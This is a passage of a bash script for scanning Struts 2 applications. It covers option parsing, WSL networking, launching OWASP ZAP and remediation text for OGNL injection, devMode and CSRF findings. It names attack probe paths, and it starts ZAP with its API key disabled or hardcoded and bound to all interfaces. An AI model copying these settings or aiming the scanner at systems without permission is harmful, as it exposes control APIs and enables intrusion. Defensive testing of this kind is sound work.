#!/bin/bash

# Struts 2 Comprehensive Security Testing Script with Authentication
# Specialized for Struts 2 applications with authentication mechanisms
# Based on generic-security-test.sh with enhanced features
# Usage: ./struts2-comprehensive-security-test.sh [TARGET_URL] [MODE] [OPTIONS]

# Enable debug mode if DEBUG=1 environment variable is set
if [ "${DEBUG:-0}" = "1" ]; then
    set -x
fi

# Note: NOT using 'set -e' to allow script to continue even if individual tests fail

# Error trap for debugging - shows what command fails
error_trap() {
    local exit_code=$?
    if [ $exit_code -ne 0 ]; then
        echo -e "\n\033[0;31m ERROR: Command failed with exit code $exit_code\033[0m" >&2
        echo -e "\033[0;33m Line: $BASH_LINENO\033[0m" >&2
        echo -e "\033[0;33m Command: $BASH_COMMAND\033[0m" >&2
        echo -e "\033[0;33m Phase: ${PHASE_NUM:-unknown}\033[0m" >&2
    fi
}
trap 'error_trap' ERR

# ===================================================================
# ENVIRONMENT DETECTION
# ===================================================================

# Detect OS
OS_TYPE="unknown"
RUNNING_IN_WSL=false

# Check if running in Git Bash / MSYS / Cygwin (native Windows bash)
if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "win32" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
    OS_TYPE="windows"
    RUNNING_IN_WSL=false
    echo " Detected: Windows (Git Bash)"
# Check if running in WSL (Windows Subsystem for Linux)
elif grep -qEi "(Microsoft|WSL)" /proc/version 2>/dev/null; then
    OS_TYPE="windows"
    RUNNING_IN_WSL=true
    echo " Detected: Windows (WSL)"
elif [[ "$OSTYPE" == "darwin"* ]]; then
    OS_TYPE="mac"
    echo " Detected: macOS"
elif [[ "$OSTYPE" == "linux-gnu"* ]]; then
    OS_TYPE="linux"
    echo " Detected: Linux"
fi

# Parse command line arguments
TARGET_URL=""
MODE="full"  # full, quick, auth-only, ognl-scan
CLEAN_OUTPUT="false"

# Authentication Configuration
AUTH_TYPE="none"  # none, form, basic
LOGIN_URL=""
USERNAME=""
PASSWORD=""
SUCCESS_INDICATOR=""
FAILURE_INDICATOR=""
SESSION_COOKIE="JSESSIONID"
CSRF_TOKEN_NAME="struts.token"

# Struts 2 Specific Options
STRUTS_VERSION=""
OGNL_DEEP_SCAN=false
ACTION_ENUMERATION=false
DEVMODE_CHECK=true
NAMESPACE_TRAVERSAL=true

# Standard Configuration
ZAP_PORT="${ZAP_PORT:-8090}"
ZAP_HOST="${ZAP_HOST:-127.0.0.1}"
TIMEOUT="${TIMEOUT:-300}"

# Windows-specific ZAP configuration
ZAP_EXE=""
ZAP_WINDOWS_HOST=""

# Parse arguments
while [[ $# -gt 0 ]]; do
    case $1 in
        --auth-type=*)
            AUTH_TYPE="${1#*=}"
            shift
            ;;
        --login-url=*)
            LOGIN_URL="${1#*=}"
            shift
            ;;
        --username=*)
            USERNAME="${1#*=}"
            shift
            ;;
        --password=*)
            PASSWORD="${1#*=}"
            shift
            ;;
        --success-indicator=*)
            SUCCESS_INDICATOR="${1#*=}"
            shift
            ;;
        --failure-indicator=*)
            FAILURE_INDICATOR="${1#*=}"
            shift
            ;;
        --session-cookie=*)
            SESSION_COOKIE="${1#*=}"
            shift
            ;;
        --csrf-token-name=*)
            CSRF_TOKEN_NAME="${1#*=}"
            shift
            ;;
        --struts-version=*)
            STRUTS_VERSION="${1#*=}"
            shift
            ;;
        --ognl-deep-scan)
            OGNL_DEEP_SCAN=true
            shift
            ;;
        --action-enumeration)
            ACTION_ENUMERATION=true
            shift
            ;;
        --devmode-check)
            DEVMODE_CHECK=true
            shift
            ;;
        --no-devmode-check)
            DEVMODE_CHECK=false
            shift
            ;;
        --namespace-traversal)
            NAMESPACE_TRAVERSAL=true
            shift
            ;;
        --clean)
            CLEAN_OUTPUT="true"
            shift
            ;;
        http://*|https://*)
            TARGET_URL="$1"
            shift
            ;;
        full|quick|auth-only|ognl-scan|zap-only)
            MODE="$1"
            shift
            ;;
        *)
            echo "Unknown option: $1"
            shift
            ;;
    esac
done

# Colors - disable for clean output
if [ "$CLEAN_OUTPUT" = "true" ]; then
    RED=''
    GREEN=''
    YELLOW=''
    BLUE=''
    PURPLE=''
    CYAN=''
    GRAY=''
    NC=''
else
    RED='\033[0;31m'
    GREEN='\033[0;32m'
    YELLOW='\033[1;33m'
    BLUE='\033[0;34m'
    PURPLE='\033[0;35m'
    CYAN='\033[0;36m'
    GRAY='\033[0;90m'
    NC='\033[0m'
fi

# Test tracking
TESTS_PASSED=0
TESTS_FAILED=0
TESTS_TOTAL=0
HIGH_RISK_FINDINGS=0
MEDIUM_RISK_FINDINGS=0
LOW_RISK_FINDINGS=0
INFORMATIONAL_FINDINGS=0

# Findings tracking arrays
HIGH_RISK_LIST=()
MEDIUM_RISK_LIST=()
LOW_RISK_LIST=()
INFO_LIST=()

# Authentication session tracking
SESSION_COOKIE_VALUE=""
AUTHENTICATED=false
LOGIN_TESTED=false
CSRF_TOKEN_VALUE=""
CSRF_TOKEN_EXTRACTED=false

# Struts 2 specific tracking
OGNL_VULNERABILITIES_FOUND=0
ACTION_METHOD_ISSUES=0
STRUTS_VERSION_DETECTED=""
DEVMODE_ENABLED=false

# Validate input
if [ -z "$TARGET_URL" ]; then
    echo -e "${RED} Error: Target URL is required${NC}"
    echo -e "${PURPLE} STRUTS 2 COMPREHENSIVE SECURITY SCANNER${NC}"
    echo -e "${PURPLE}===========================================${NC}"
    echo -e "${BLUE}Usage: $0 <TARGET_URL> [MODE] [OPTIONS]${NC}"
    echo ""
    echo -e "${YELLOW}MODES:${NC}"
    echo -e "${BLUE}  full      - Complete security scan (auth + OGNL + all tests, 20-60 min, default)${NC}"
    echo -e "${BLUE}  quick     - Fast core tests without ZAP (~5 minutes)${NC}"
    echo -e "${BLUE}  auth-only - Authentication security testing only${NC}"
    echo -e "${BLUE}  ognl-scan - Struts 2 OGNL injection testing only${NC}"
    echo -e "${BLUE}  zap-only  - ZAP deep vulnerability scan only${NC}"
    echo ""
    echo -e "${YELLOW}AUTHENTICATION OPTIONS:${NC}"
    echo -e "${BLUE}  --auth-type=form|basic|none${NC}"
    echo -e "${BLUE}  --login-url=/login.action${NC}"
    echo -e "${BLUE}  --username=testuser${NC}"
    echo -e "${BLUE}  --password=password123${NC}"
    echo -e "${BLUE}  --success-indicator=\"dashboard\"${NC}"
    echo -e "${BLUE}  --failure-indicator=\"error\"${NC}"
    echo -e "${BLUE}  --session-cookie=JSESSIONID${NC}"
    echo -e "${BLUE}  --csrf-token-name=struts.token${NC}"
    echo ""
    echo -e "${YELLOW}STRUTS 2 SPECIFIC OPTIONS:${NC}"
    echo -e "${BLUE}  --struts-version=2.5${NC}"
    echo -e "${BLUE}  --ognl-deep-scan           Enable comprehensive OGNL testing${NC}"
    echo -e "${BLUE}  --action-enumeration       Discover all action mappings${NC}"
    echo -e "${BLUE}  --devmode-check            Test for development mode (default: true)${NC}"
    echo -e "${BLUE}  --namespace-traversal      Test namespace security (default: true)${NC}"
    echo ""
    echo -e "${YELLOW}EXAMPLES:${NC}"
    echo -e "${BLUE}  # Quick scan (no ZAP, ~5 min)${NC}"
    echo -e "${GRAY}  $0 http://localhost:8080/myapp quick${NC}"
    echo ""
    echo -e "${BLUE}  # Full scan with ZAP (~20-60 min)${NC}"
    echo -e "${GRAY}  $0 http://localhost:8080/myapp full${NC}"
    echo ""
    echo -e "${BLUE}  # Windows + Docker (use host.docker.internal)${NC}"
    echo -e "${GRAY}  $0 http://host.docker.internal:7070/struts2TestingApp quick${NC}"
    echo ""
    echo -e "${BLUE}  # With authentication${NC}"
    echo -e "${GRAY}  $0 http://localhost:8080/myapp full --auth-type=form --login-url=/login.action --username=admin --password=admin123${NC}"
    echo ""
    echo -e "${BLUE}  # Deep OGNL scan${NC}"
    echo -e "${GRAY}  $0 http://localhost:8080/myapp ognl-scan --ognl-deep-scan --struts-version=2.5${NC}"
    echo ""
    echo -e "${YELLOW} WINDOWS NOTES:${NC}"
    echo -e "${CYAN}  - Script auto-detects Windows and configures ZAP automatically${NC}"
    echo -e "${CYAN}  - localhost URLs are automatically translated to Windows host IP for WSL${NC}"
    echo -e "${CYAN}  - For Docker containers, use: host.docker.internal:PORT${NC}"
    echo -e "${CYAN}  - Full mode starts ZAP daemon if not running (may need firewall approval)${NC}"
    echo -e "${CYAN}  - Quick mode works without ZAP and tests core vulnerabilities${NC}"
    exit 1
fi

# Ensure URL has protocol
if [[ ! "$TARGET_URL" =~ ^https?:// ]]; then
    TARGET_URL="https://$TARGET_URL"
fi

# Windows localhost handling
if [ "$OS_TYPE" = "windows" ] && echo "$TARGET_URL" | grep -q "localhost"; then
    if [ "$RUNNING_IN_WSL" = false ]; then
        # Git Bash: Replace localhost with 127.0.0.1 to force IPv4 (Git Bash curl prefers IPv6)
        ORIGINAL_URL="$TARGET_URL"
        TARGET_URL=$(echo "$TARGET_URL" | sed "s/localhost/127.0.0.1/g")
        echo -e "${CYAN} Git Bash: Converting localhost to 127.0.0.1 (forcing IPv4)${NC}"
        echo -e "${CYAN}   Original: $ORIGINAL_URL${NC}"
        echo -e "${CYAN}   Converted: $TARGET_URL${NC}"
        echo ""
    elif [ "$RUNNING_IN_WSL" = true ]; then
        # WSL: translate localhost to Windows host IP
        # First, test if localhost actually works (modern WSL with mirroring)
    # Extract port from TARGET_URL
    LOCALHOST_PORT=$(echo "$TARGET_URL" | sed -n 's/.*localhost:\([0-9]*\).*/\1/p')
    if [ -z "$LOCALHOST_PORT" ]; then
        LOCALHOST_PORT="80"
    fi
    
    # Test if localhost mirroring works with actual target port
    if curl -s --connect-timeout 2 --max-time 3 -o /dev/null -w "%{http_code}" "http://localhost:${LOCALHOST_PORT}/" 2>/dev/null | grep -qE "^[2-5][0-9][0-9]$"; then
        echo -e "${CYAN} WSL localhost mirroring detected - using localhost directly${NC}"
        echo ""
    else
        # Localhost doesn't work - need to translate to Windows host IP
        # Try multiple methods to get Windows host IP
        WINDOWS_HOST_IP=""
        
        # Method 1: Try ip route (most reliable for WSL2)
        if command -v ip >/dev/null 2>&1; then
            WINDOWS_HOST_IP=$(ip route show | grep -i default | awk '{print $3}' | head -1)
        fi
        
        # Method 2: Fallback to resolv.conf nameserver (less reliable but common)
        if [ -z "$WINDOWS_HOST_IP" ] || [ "$WINDOWS_HOST_IP" = "0.0.0.0" ]; then
            WINDOWS_HOST_IP=$(grep -m 1 nameserver /etc/resolv.conf | awk '{print $2}')
        fi
        
        if [ -n "$WINDOWS_HOST_IP" ] && [ "$WINDOWS_HOST_IP" != "0.0.0.0" ]; then
            ORIGINAL_URL="$TARGET_URL"
            TARGET_URL=$(echo "$TARGET_URL" | sed "s/localhost/$WINDOWS_HOST_IP/g")
            echo -e "${CYAN} WSL Network Translation:${NC}"
            echo -e "${CYAN}   Original: $ORIGINAL_URL${NC}"
            echo -e "${CYAN}   Translated: $TARGET_URL${NC}"
            echo -e "${CYAN}   Windows Host IP: $WINDOWS_HOST_IP${NC}"
            echo -e "${YELLOW}   Note: If this IP doesn't work, use your actual Windows IP instead of localhost${NC}"
            echo ""
        else
            echo -e "${YELLOW} WARNING: Could not detect Windows host IP - localhost may not work${NC}"
            echo -e "${YELLOW}   If connection fails, replace 'localhost' with your Windows IP address${NC}"
            echo ""
        fi
    fi
    fi
fi

# Test target connectivity BEFORE starting scan
echo -e "${CYAN} Testing connection to target...${NC}"
if ! curl -s --connect-timeout 10 --max-time 15 -o /dev/null -w "%{http_code}" "$TARGET_URL" 2>/dev/null | grep -qE "^[2-5][0-9][0-9]$"; then
    echo -e "${RED}\n FATAL ERROR: Cannot connect to target URL${NC}"
    echo -e "${RED}===============================================${NC}"
    echo -e "${YELLOW}Target: ${TARGET_URL}${NC}"
    echo -e "${YELLOW}Problem: Connection refused, timeout, or invalid URL${NC}"
    echo -e "${YELLOW}\nPossible causes:${NC}"
    echo -e "${CYAN}  1. Application is not running${NC}"
    echo -e "${CYAN}  2. Wrong port number${NC}"
    echo -e "${CYAN}  3. Wrong IP address (check WSL translation above)${NC}"
    echo -e "${CYAN}  4. Firewall blocking connection${NC}"
    echo -e "${CYAN}  5. URL path is incorrect${NC}"
    echo -e "${YELLOW}\nTroubleshooting:${NC}"
    echo -e "${BLUE}  - Check app is running: netstat -ano | findstr :8080${NC}"
    echo -e "${BLUE}  - Test in browser first: ${TARGET_URL}${NC}"
    echo -e "${BLUE}  - For WSL: Use the translated IP shown above${NC}"
    echo -e "${BLUE}  - For localhost issues on older WSL: Use actual IP instead${NC}"
    echo ""
    exit 1
fi
echo -e "${GREEN} Connection successful!${NC}\n"

echo -e "${PURPLE} STRUTS 2 COMPREHENSIVE SECURITY SCANNER${NC}"
echo -e "${PURPLE}============================================${NC}"
echo -e "${BLUE}Target: ${TARGET_URL}${NC}"
echo -e "${BLUE}Mode: ${MODE}${NC}"
echo -e "${BLUE}Timestamp: $(date)${NC}"
if [ "$AUTH_TYPE" != "none" ]; then
    echo -e "${CYAN}Authentication: ${AUTH_TYPE} (${LOGIN_URL:-N/A})${NC}"
    echo -e "${CYAN}Username: ${USERNAME}${NC}"
fi
if [ "$OGNL_DEEP_SCAN" = true ]; then
    echo -e "${YELLOW}OGNL Deep Scan: ENABLED${NC}"
fi
if [ -n "$STRUTS_VERSION" ]; then
    echo -e "${CYAN}Target Struts Version: ${STRUTS_VERSION}${NC}"
fi
echo -e "${BLUE}Output: Terminal display only${NC}\n"

# Error tracking - POSIX compatible
ERROR_COUNT=0
ERROR_SEEN=""  # Simple string to track seen errors

# Function to log results with error tracking
log_result() {
    echo "$1"
}

# Function to handle errors with detailed reporting - POSIX compatible
handle_error() {
    local error_msg="$1"
    local location="$2"
    local condition="$3"
    local fix_suggestion="$4"
    
    # Create unique error key to avoid duplicates
    local error_key="${location}:${error_msg}"
    
    # Check if we've seen this error before using simple string matching
    if echo "$ERROR_SEEN" | grep -q "$error_key"; then
        return 0  # Already reported this erro
    fi
    
    # Add to seen errors list
    ERROR_SEEN="${ERROR_SEEN}|${error_key}"
    ERROR_COUNT=$((ERROR_COUNT + 1))
    
    echo -e "${RED} ERROR #${ERROR_COUNT}: ${error_msg}${NC}"
    echo -e "${BLUE}    LOCATION: ${location}${NC}"
    echo -e "${BLUE}    CONDITION: ${condition}${NC}"
    if [ -n "$fix_suggestion" ]; then
        echo -e "${YELLOW}    SUGGESTION: ${fix_suggestion}${NC}"
    fi
    echo ""
    
    log_result "ERROR #${ERROR_COUNT}: ${error_msg} at ${location}"
}

# Function to check if a command exists
check_command() {
    local cmd_name="$1"
    local description="$2"
    local location="$3"

    if ! command -v "$cmd_name" >/dev/null 2>&1; then
        handle_error "Command not found: $description" "$location" "Command '$cmd_name' is not installed" "Check if required tools are installed and accessible"
        return 1
    fi
    return 0
}

# Function to get detailed finding explanations
get_finding_details() {
    local finding_type="$1"
    
    case "$finding_type" in
        "HSTS")
            echo " MISSING: HTTP Strict Transport Security (HSTS)"
            echo "   RISK: Medium - Allows protocol downgrade attacks"
            echo "   WHAT: Forces browsers to use HTTPS, prevents man-in-the-middle attacks"
            echo "   FIX: Add header: Strict-Transport-Security: max-age=31536000; includeSubDomains"
            echo "   EXAMPLE: In Apache: Header always set Strict-Transport-Security \"max-age=31536000; includeSubDomains\""
            ;;
        "X-Frame-Options")
            echo " MISSING: X-Frame-Options Header"
            echo "   RISK: Medium - Vulnerable to clickjacking attacks"
            echo "   WHAT: Prevents page from being embedded in frames/iframes"
            echo "   FIX: Add header: X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN"
            echo "   EXAMPLE: In nginx: add_header X-Frame-Options \"SAMEORIGIN\" always;"
            ;;
        "X-Content-Type-Options")
            echo " MISSING: X-Content-Type-Options Header"
            echo "   RISK: Low - MIME type sniffing vulnerabilities"
            echo "   WHAT: Prevents browsers from MIME-sniffing responses"
            echo "   FIX: Add header: X-Content-Type-Options: nosniff"
            echo "   EXAMPLE: In Apache: Header always set X-Content-Type-Options \"nosniff\""
            ;;
        "X-XSS-Protection")
            echo " MISSING: X-XSS-Protection Header"
            echo "   RISK: Low - Legacy XSS protection (mostly deprecated)"
            echo "   WHAT: Enables browser XSS filtering (use CSP instead)"
            echo "   FIX: Add header: X-XSS-Protection: 1; mode=block"
            echo "   BETTER: Implement Content-Security-Policy instead"
            ;;
        "Content-Security-Policy")
            echo " MISSING: Content Security Policy (CSP)"
            echo "   RISK: Medium - No protection against XSS/injection attacks"
            echo "   WHAT: Controls which resources browser can load (scripts, styles, etc.)"
            echo "   FIX: Add header: Content-Security-Policy: default-src 'self'"
            echo "   EXAMPLE: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'"
            ;;
        "Referrer-Policy")
            echo " MISSING: Referrer-Policy Header"
            echo "   RISK: Low - Information leakage via referrer"
            echo "   WHAT: Controls what referrer information is sent with requests"
            echo "   FIX: Add header: Referrer-Policy: strict-origin-when-cross-origin"
            echo "   EXAMPLE: In nginx: add_header Referrer-Policy \"strict-origin-when-cross-origin\" always;"
            ;;
        "CORS-Wildcard")
            echo " FOUND: CORS Wildcard Origin (*)"
            echo "   RISK: High - Allows any website to access your API"
            echo "   WHAT: Access-Control-Allow-Origin: * allows all domains"
            echo "   FIX: Specify exact origins: Access-Control-Allow-Origin: https://yourdomain.com"
            echo "   NEVER: Use '*' with credentials (Access-Control-Allow-Credentials: true)"
            ;;
        "XSS-Reflected")
            echo " FOUND: Reflected XSS Vulnerability"
            echo "   RISK: High - Remote code execution in user browsers"
            echo "   WHAT: User input reflected in HTML without proper escaping"
            echo "   FIX: Sanitize ALL user input, use output encoding, implement CSP"
            echo "   EXAMPLE: HTML encode: &lt;script&gt; instead of <script>"
            ;;
        "SQL-Injection")
            echo " FOUND: SQL Injection Vulnerability"
            echo "   RISK: High - Database compromise, data theft"
            echo "   WHAT: User input directly concatenated into SQL queries"
            echo "   FIX: Use parameterized queries/prepared statements ALWAYS"
            echo "   EXAMPLE: SELECT * FROM users WHERE id = ? (NOT WHERE id = '$user_input')"
            ;;
        "Info-Robots")
            echo " INFO: robots.txt File Accessible"
            echo "   RISK: Info - May reveal sensitive paths/directories"
            echo "   WHAT: robots.txt tells search engines what NOT to crawl"
            echo "   REVIEW: Check if it reveals admin panels, backup directories, etc."
            echo "   ACTION: Ensure no sensitive paths are listed in robots.txt"
            ;;
        "Info-Git")
            echo " FOUND: .git Directory Accessible"
            echo "   RISK: High - Source code disclosure"
            echo "   WHAT: Git repository accessible via web browser"
            echo "   FIX: Block access to .git in web server config"
            echo "   APACHE: <DirectoryMatch \"^\\.git\"> Require all denied </DirectoryMatch>"
            ;;
        "Info-Env")
            echo " FOUND: .env File Accessible"
            echo "   RISK: High - Environment variables/secrets exposed"
            echo "   WHAT: Environment configuration file accessible"
            echo "   FIX: Block access to .env files in web server"
            echo "   NGINX: location ~ /\\.env { deny all; }"
            ;;
        "OGNL-Injection")
            echo " FOUND: OGNL Injection Vulnerability (Struts 2)"
            echo "   RISK: CRITICAL - Remote Code Execution possible"
            echo "   WHAT: Object-Graph Navigation Language injection allows arbitrary code execution"
            echo "   CVEs: S2-045, S2-046, S2-048, S2-057, S2-059, S2-062 (multiple RCE vulnerabilities)"
            echo "   FIX: Upgrade to latest Struts 2 version (2.5.33+ or 6.3.0+)"
            echo "   IMMEDIATE ACTION: Patch immediately - this is actively exploited"
            echo "   MITIGATION: Implement input validation, disable dynamic method invocation"
            ;;
        "DevMode-Enabled")
            echo " FOUND: Struts 2 DevMode Enabled"
            echo "   RISK: High - Debug information and code execution vectors exposed"
            echo "   WHAT: Development mode provides debug info and expanded attack surface"
            echo "   FIX: Set struts.devMode=false in struts.xml or struts.properties"
            echo "   EXAMPLE: <constant name=\"struts.devMode\" value=\"false\" />"
            echo "   NEVER: Use devMode in production environments"
            ;;
        "Action-Method-Exposure")
            echo " FOUND: Exposed Action Methods (Struts 2)"
            echo "   RISK: High - Unauthorized access to dangerous action methods"
            echo "   WHAT: Direct invocation of action methods (! notation) without authorization"
            echo "   EXAMPLES: /action!execute.action, /admin!delete.action"
            echo "   FIX: Configure strict method access control in struts.xml"
            echo "   CONFIG: <constant name=\"struts.enable.DynamicMethodInvocation\" value=\"false\" />"
            echo "   VALIDATION: Implement proper authorization on all action methods"
            ;;
        "Namespace-Traversal")
            echo " FOUND: Namespace Traversal Possible (Struts 2)"
            echo "   RISK: Medium - Unauthorized access to restricted namespaces"
            echo "   WHAT: Path traversal allows accessing actions in protected namespaces"
            echo "   EXAMPLES: /app/../admin/secure.action"
            echo "   FIX: Implement proper namespace access controls and input validation"
            echo "   STRUTS: Configure namespace restrictions in struts.xml"
            ;;
        "Auth-Bypass")
            echo " FOUND: Authentication Bypass"
            echo "   RISK: CRITICAL - Unauthorized access to protected resources"
            echo "   WHAT: Authentication mechanism can be bypassed"
            echo "   FIX: Review authentication filters, session management, and access controls"
            echo "   STRUTS: Ensure interceptors are properly configured for all actions"
            echo "   VALIDATION: Implement server-side authorization checks"
            ;;
        "Weak-Session")
            echo " FOUND: Weak Session Management"
            echo "   RISK: High - Session hijacking and fixation possible"
            echo "   WHAT: Session cookies lack security attributes or predictable patterns"
            echo "   FIX: Set Secure, HttpOnly, SameSite attributes on session cookies"
            echo "   STRUTS: Regenerate session ID after login"
            echo "   EXAMPLE: session.setMaxInactiveInterval(900); // 15 minutes"
            ;;
        "CSRF-Token-Missing")
            echo " FOUND: Missing CSRF Protection (Struts 2)"
            echo "   RISK: Medium - Cross-Site Request Forgery attacks possible"
            echo "   WHAT: Struts token interceptor not configured or tokens not validated"
            echo "   FIX: Add token or tokenSession interceptor to action configuration"
            echo "   STRUTS XML: <interceptor-ref name=\"token\"/>"
            echo "   JSP: <s:token /> in forms"
            ;;
    esac
}

# Function to run a test with detailed reporting
run_test() {
    local test_name="$1"
    local test_input="$2"
    local success_pattern="$3"
    local failure_is_good="${4:-false}"  # Some tests should fail for security
    local finding_type="${5:-}"  # For detailed explanations

    TESTS_TOTAL=$((TESTS_TOTAL + 1))

    echo -n "Testing: $test_name... "

    # Use direct string matching instead of eval to prevent command injection
    result="$test_input"
    
    # Check result
    local test_passed=false
    if [ "$failure_is_good" = "true" ]; then
        # For security tests where failure indicates good security
        if ! echo "$result" | grep -qi "$success_pattern"; then
            test_passed=true
        fi
    else
        # Normal tests where success pattern indicates pass
        if echo "$result" | grep -qi "$success_pattern"; then
            test_passed=true
        fi
    fi
    
    if [ "$test_passed" = "true" ]; then
        echo -e "${GREEN}PASS${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
        log_result " PASS: $test_name"
    else
        echo -e "${RED}FAIL${NC}"
        TESTS_FAILED=$((TESTS_FAILED + 1))
        log_result " FAIL: $test_name"
        
        # Add detailed explanation if finding type provided
        if [ -n "$finding_type" ]; then
            echo -e "${YELLOW}$(get_finding_details "$finding_type" | head -1)${NC}"
            get_finding_details "$finding_type" | tail -n +2
            echo ""
        else
            log_result "   Result: $result"
        fi
    fi
}

# Function to check if ZAP is running
check_zap_status() {
    # Try to get ZAP version - this confirms ZAP is fully ready
    local response=$(curl -s --connect-timeout 5 --max-time 10 "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/view/version/" 2>&1)
    
    # Check if we got a valid JSON response with version info
    if echo "$response" | grep -q "version"; then
        return 0  # ZAP is ready
    else
        echo "Debug: ZAP check failed. Response: $response" >&2
        return 1  # ZAP not ready or not responding
    fi
}

# Function to start ZAP if needed
start_zap_if_needed() {
    if ! check_zap_status; then
        echo -e "${YELLOW} Starting OWASP ZAP...${NC}"
        
        # Windows-specific ZAP handling
        if [ "$OS_TYPE" = "windows" ]; then
            echo -e "${CYAN} Note: Starting ZAP daemon on Windows...${NC}"
            
            # Find ZAP on Windows (try both Git Bash and WSL path formats)
            ZAP_EXE=""
            if [ -f "/mnt/c/Program Files/ZAP/Zed Attack Proxy/ZAP.exe" ]; then
                ZAP_EXE="/mnt/c/Program Files/ZAP/Zed Attack Proxy/ZAP.exe"
            elif [ -f "/c/Program Files/ZAP/Zed Attack Proxy/ZAP.exe" ]; then
                ZAP_EXE="/c/Program Files/ZAP/Zed Attack Proxy/ZAP.exe"
            elif [ -f "/mnt/c/Program Files (x86)/ZAP/Zed Attack Proxy/ZAP.exe" ]; then
                ZAP_EXE="/mnt/c/Program Files (x86)/ZAP/Zed Attack Proxy/ZAP.exe"
            elif [ -f "/c/Program Files (x86)/ZAP/Zed Attack Proxy/ZAP.exe" ]; then
                ZAP_EXE="/c/Program Files (x86)/ZAP/Zed Attack Proxy/ZAP.exe"
            fi
            
            if [ -z "$ZAP_EXE" ]; then
                echo -e "${RED} ZAP not found on Windows${NC}"
                echo -e "${YELLOW}Please start ZAP manually:${NC}"
                echo -e "${BLUE}   1. Open PowerShell${NC}"
                echo -e "${BLUE}   2. cd 'C:\\\\Program Files\\\\ZAP\\\\Zed Attack Proxy'${NC}"
                echo -e "${BLUE}   3. .\\\\zap.bat -daemon -host 0.0.0.0 -port $ZAP_PORT -config api.key=changeme123456${NC}"
                echo -e "${BLUE}   4. Allow through Windows Firewall when prompted${NC}"
                echo -e "${BLUE}   5. Wait 30 seconds for ZAP to start, then run this script again${NC}"
                echo -e "${YELLOW}Or run quick mode without ZAP: bash $0 $TARGET_URL quick${NC}"
                return 1
            fi
            
            echo -e "${BLUE} Launching ZAP daemon on 0.0.0.0:$ZAP_PORT...${NC}"
            echo -e "${YELLOW}  You may need to allow ZAP through Windows Firewall${NC}"
            
            # Use zap.bat which handles Java classpath correctly
            # Must run from ZAP's directory
            WIN_ZAP_DIR="C:\\Program Files\\ZAP\\Zed Attack Proxy"
            
            # Start ZAP using PowerShell from WSL with correct working directory
            powershell.exe -Command "Set-Location '$WIN_ZAP_DIR'; Start-Process -FilePath '.\\zap.bat' -ArgumentList '-daemon','-host','0.0.0.0','-port','$ZAP_PORT','-config','api.key=changeme123456','-config','api.addrs.addr.name=.*','-config','api.addrs.addr.regex=true' -WindowStyle Hidden" > /tmp/zap_startup.log 2>&1
            ZAP_PID=$!
            
            # Update ZAP_HOST for Windows to use host IP
            # Get Windows host IP that Docker can reach
            if command -v ipconfig.exe >/dev/null 2>&1; then
                # Extract first active IPv4 address
                ZAP_WINDOWS_HOST=$(ipconfig.exe | grep -A 10 "Ethernet\|Wi-Fi" | grep "IPv4" | head -1 | sed 's/.*: //;s/\r//')
                if [ -n "$ZAP_WINDOWS_HOST" ]; then
                    echo -e "${CYAN} Windows Host IP: $ZAP_WINDOWS_HOST${NC}"
                    echo -e "${CYAN}   Docker/WSL will connect to ZAP at: http://$ZAP_WINDOWS_HOST:$ZAP_PORT${NC}"
                    ZAP_HOST="$ZAP_WINDOWS_HOST"
                fi
            fi
            
        else
            # Mac/Linux ZAP handling
            echo -e "${CYAN} Note: First startup can take 3-5 minutes${NC}"
            
            # Try to start ZAP with visible output for better debugging
            if command -v zap.sh >/dev/null 2>&1; then
                echo -e "${BLUE} Launching ZAP daemon on port $ZAP_PORT...${NC}"
                zap.sh -daemon -port "$ZAP_PORT" -config api.disablekey=true > /tmp/zap_startup.log 2>&1 &
                ZAP_PID=$!
            elif command -v owasp-zap >/dev/null 2>&1; then
                echo -e "${BLUE} Launching ZAP daemon on port $ZAP_PORT...${NC}"
                owasp-zap -daemon -port "$ZAP_PORT" -config api.disablekey=true > /tmp/zap_startup.log 2>&1 &
                ZAP_PID=$!
            else
                echo -e "${RED} OWASP ZAP not found. Please install ZAP or run manually on port $ZAP_PORT${NC}"
                return 1
            fi
        fi
        
        # Show startup progress
        echo -e "${YELLOW} ZAP is initializing (this may take several minutes on Apple Silicon Macs)...${NC}"
        echo -n "Progress: "
        
        # Extended timeout for macOS (especially Apple Silicon) - up to 5 minutes
        local max_attempts=150  # 150  2s = 5 minutes
        local attempt=0
        
        while [ $attempt -lt $max_attempts ]; do
            if check_zap_status; then
                echo -e "\n${GREEN} ZAP daemon is ready!"
                return 0
            fi
            
            # Show progress every 10 attempts (20 seconds)
            if [ $((attempt % 10)) -eq 0 ]; then
                local elapsed=$((attempt * 2))
                echo -n "${elapsed}s "
                
                # Show what ZAP is doing (last few lines of log)
                if [ -f "/tmp/zap_startup.log" ]; then
                    local last_line=$(tail -1 /tmp/zap_startup.log 2>/dev/null | grep -o "INFO.*" | head -c 60)
                    if [ -n "$last_line" ]; then
                        echo -e "\n${CYAN} Status: $last_line...${NC}"
                        echo -n "Progress: "
                    fi
                fi
            else
                echo -n "."
            fi
            
            # Check if ZAP process is still running
            if ! kill -0 $ZAP_PID 2>/dev/null; then
                echo -e "\n${RED} ZAP process died during startup${NC}"
                echo -e "${YELLOW} Startup log (last 20 lines):${NC}"
                tail -20 /tmp/zap_startup.log 2>/dev/null || echo "No log available"
                return 1
            fi
            
            attempt=$((attempt + 1))
            sleep 2
        done
        
        echo -e "\n${RED} ZAP failed to start within timeout (${max_attempts} attempts, $((max_attempts * 2)) seconds)${NC}"
        echo -e "${YELLOW} ZAP startup log (last 30 lines):${NC}"
        tail -30 /tmp/zap_startup.log 2>/dev/null || echo "No log available"
        echo -e "${BLUE} Try running ZAP manually: zap.sh -daemon -port $ZAP_PORT -config api.disablekey=true${NC}"
        return 1
    else
        echo -e "${GREEN} ZAP is already running${NC}"
    fi
}

# Function to run basic security header tests
run_security_headers_test() {
    local phase_display=${PHASE_NUM:-1}
    echo -e "\n${YELLOW} PHASE $phase_display: SECURITY HEADERS ANALYSIS${NC}"
    
    # Test for important security headers with error handling
    echo -e "${BLUE} Fetching HTTP headers from target (following redirects)...${NC}"
    # Get ALL headers from redirect chain for security header analysis
    all_headers=$(curl -sIL --connect-timeout 10 --max-time 30 --max-redirs 5 "$TARGET_URL" 2>/dev/null)
    
    # For security headers, we need to check ALL responses in the redirect chain
    # because headers like HSTS can appear in redirect responses
    headers="$all_headers"
    
